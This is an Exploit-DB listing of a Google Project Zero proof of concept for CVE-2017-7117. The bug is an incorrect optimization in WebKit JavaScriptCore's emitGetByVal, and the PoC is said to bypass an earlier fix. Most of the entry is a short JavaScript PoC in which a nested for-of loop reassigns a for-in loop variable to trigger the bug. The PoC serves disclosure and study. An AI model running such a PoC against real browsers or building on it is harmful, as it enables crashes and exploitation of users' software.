WebKit JSC - 'BytecodeGenerator::emitGetByVal' Incorrect Optimization (2)

EDB-ID: 42955
Author: Google Security Research
Published: 2017-10-04
CVE: CVE-2017-7117
Type: Dos
Platform: Multiple
Aliases: N/A
Advisory/Source: Link
Tags: N/A
Vulnerable App: N/A

 Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1319 
  
 The following PoC bypasses the fix for the  issue 1263 (https://bugs.chromium.org/p/project-zero/issues/detail?id=1263) 
  
 PoC: 
 --> 
  
 function f() { 
     let o = {}; 
     for (let i in {xx: 0}) { 
         for (i of [0]) { 
  
         } 
  
         print(o[i]); 
     } 
 } 
  
 f();

Source: www.exploit-db.com